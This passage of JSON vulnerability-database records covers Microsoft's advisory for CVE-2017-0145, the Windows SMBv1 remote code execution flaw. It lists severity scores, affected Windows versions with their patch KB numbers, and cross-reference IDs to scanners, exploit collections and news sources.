["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-30T20:47:04", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB3210721", "KB4012606", "KB4012216", "KB3210720", "KB3177186", "KB3212646", "KB4012217", "KB4012598", "KB3205401", "KB4012212", "KB3213986", "KB4014077", "KB3205409", "KB4012215", "KB4012213", "KB4012214", "KBMS16-110, 3187754", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T20:47:04", "differentElements": ["msAffectedSoftware"], "edition": 83}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-01T06:44:56", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3212646", "KB3210721", "KB4013429", "KB4012214", "KB4012606", "KB4013198", "KB3205401", "KB4012215", "KB3177186", "KBMS16-110, 3187754", "KB3213986", "KB3210720", "KB4012598", "KB4012212", "KB4014077", "KB4012216", "KB4012217", "KB4012213", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T06:44:56", "differentElements": ["msAffectedSoftware"], "edition": 84}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-01T09:06:55", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", 